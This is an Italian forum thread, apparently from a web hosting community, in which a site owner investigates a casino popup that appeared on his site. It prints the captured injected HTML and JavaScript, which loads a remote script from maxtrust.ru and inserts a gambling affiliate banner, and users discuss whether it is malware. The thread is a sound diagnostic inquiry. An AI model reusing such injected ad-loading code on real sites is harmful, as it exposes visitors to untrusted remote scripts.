Popup da dominio maxtrust.ru appartiene ai circuiti speciali di altervista?

[darkwolf]

Entrando come visitatore con un netbook con chrome sul mio sito mi è spuntato un popup "casinò":


Non avendo mai visto prima un popup sul mio sito mi sono subito insospettito e così ho fatto screenshot ed ho intercettato l'origine con gli strumenti per sviluppatori di chrome e questo è quanto ho ricavato:

Ecco com'è stato iniettato nella pagina subito dopo la toolbar (scomparso dopo un refresh):

Codice HTML:

<!-- END AV_TOOLBAR -->

    <script type="text/javascript" src="?ipbv=716c13aa91be982747deb79316d1a0bd&amp;f=public/js/ips.quickpm.js&amp;b=4"></script><style>#__closeButton{ position:absolute; display:inline; right:5px; top:0px; font:bold 14px Tahoma; color:#ccc; cursor:pointer;}#__closeButton:hover{color:white;}.__adBlockText{margin-top:4px; padding-bottom:4px; display:inline; font:9px Georgia; color:#bcbcbc; background-color:#222; cursor:default;}#__fixme { position: absolute; left:2px; bottom: 2px; width:254px; height:270px; text-align:center; background-color:#222; }body > div#__fixme { position: fixed; }</style><!--[if gte IE 5.5]><![if lt IE 7]><style>div#__fixme { bottom:auto; left:2px; left:2px; top: expression( ( -2 - __fixme.offsetHeight + ( document.documentElement.clientHeight ? document.documentElement.clientHeight : document.body.clientHeight ) + ( ignoreMe = document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop ) ) + 'px' );}body{ background: url('/n.gif') no-repeat; background-attachment: fixed; }#__closeButton{ position:relative; display:inline; right:-100px; cursor:hand; }</style><![endif]><![endif]--><script>var swfobject;</script><script type="text/javascript" src="http://maxtrust.ru/js/swfobject.js"></script>
<div id="__fixme" style="z-index:1000"><div id="__closeButton" onclick="document.getElementById('__fixme').style.display='none';">x</div><div class="__adBlockText">ADVERTISMENT</div><div id="ads_container"><a href="?ipbv=716c13aa91be982747deb79316d1a0bd&amp;go=4" target="_blank"><img src="https://www.affactive.com/RESOURCES/WinPalace/2011031712014010/wp_28005_welcome_bonus_IT_250x250.gif" width="250" height="250" border="0/"></a></div></div>

e cosa mostra il sorgente del js:

Codice HTML:

var x='';
x += '<'+'style>';
x += '#__closeButton{ position:absolute; display:inline; right:5px; top:0px; font:bold 14px Tahoma; color:#ccc; cursor:pointer;}';
x += '#__closeButton:hover{color:white;}';
x += '.__adBlockText{margin-top:4px; padding-bottom:4px; display:inline; font:9px Georgia; color:#bcbcbc; background-color:#222; cursor:default;}';
x += '#__fixme { position: absolute; left:2px; bottom: 2px; width:254px; height:270px; text-align:center; background-color:#222; }';
x += 'body > div#__fixme { position: fixed; }';
x += '</style>';
x += '<!--[if gte IE 5.5]><![if lt IE 7]><style>';
x += 'div#__fixme { bottom:auto; left:2px; left:2px; top: expression( ( -2 - __fixme.offsetHeight + ( document.documentElement.clientHeight ? document.documentElement.clientHeight : document.body.clientHeight ) + ( ignoreMe = document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop ) ) + \'px\' );}';
x += 'body{ background: url(\'/n.gif\') no-repeat; background-attachment: fixed; }';
x += '#__closeButton{ position:relative; display:inline; right:-100px; cursor:hand; }';
x += '</style><![endif]><![endif]-->';
x += '<scr'+'ipt>var swfobject;</sc'+'ript>';
x += '<scr'+'ipt type="text/javascript" src="http://maxtrust.ru/js/swfobject.js"></sc'+'ript>';
document.writeln(x);
document.writeln('<div id="__fixme" style="z-index:1000"><div id="__closeButton" onclick="document.getElementById(\'__fixme\').style.display=\'none\';">x</div><div class="__adBlockText">ADVERTISMENT</div><div id="ads_container"></div></div>');
function __wait(){ if(document.getElementById('ads_container')) document.getElementById('ads_container').innerHTML = ('<a href="?ipbv=716c13aa91be982747deb79316d1a0bd&go=4" target="_blank"><img src="https://www.affactive.com/RESOURCES/WinPalace/2011031712014010/wp_28005_welcome_bonus_IT_250x250.gif" width="250" height="250" border=0/></a>'); else setTimeout('__wait()', 10); }
__wait();

é roba lecita di AV oppure c'è qualcosa che non quadra (scusate ma data l'estensione *.ru il sospetto mi viene)?

.ru è un dominio russo, non so se Altervista ha nel suo circuito domini russi, poi il fatto che sia comparso come pop up non è una bella cosa, a me puzza di virus.

[darkwolf]

Che ru è russo lo so (da qui nasceva uil sospetto), mentre per il fatto dei popup non dovrebbe essere grave dato che ho aderito ai circuiti speciali

A questo non lo sapevo, pardon;

Quindi se hai aderito hai circuiti speciali, potrebbe essere normale; prima avevo detto che mi sembrava un virus, perché appunto non sapevo che avevi aderito hai circuiti speciali, e mi sembrava strano che compariva un pop up dal nulla.

[darkwolf]

La cosa che più mi fa strano è il richiamo di (un file di ipb presente nel mio spazio - non richiamato in consdizioni standard nei sorgenti della pagina):

Codice HTML:

<script type="text/javascript" src="?ipbv=*&amp;f=public/js/ips.quickpm.js&amp;b=4"></script>

Mi chiedo: per quale motivo una pubblicità dovrebbe richiamare un JS di ipb?
A me sa seriamente di marcio

[andreafallico]

Di solito i domini russi sono malevoli: http://sitecheck.sucuri.net/results/...s/swfobject.js

[darkwolf]

A me il mio sito però sembrerebbe pulito e prima e dopo quel singolo popup non ho avuto alcun altro problema (e i sorgenti della home non rilevano altre anomalie): https://www.virustotal.com/url/9270b...is/1353703010/
- Sinceramente non so che pensare

[Gianluca]

Non sembra aver attinenza con i circuiti speciali, non si tratta di un tipo di campagna che normalmente viene distribuita, abbiamo tuttavia sottoposto la cosa ai network esterni che alimentano questi circuiti per le verifiche del caso.

[darkwolf]

Ok, grazie Gialuca
Ma giusto per togliersi il dubbio se il sito ha qualche bug/infezione strana o se è solo una pubblicità diversa dal solito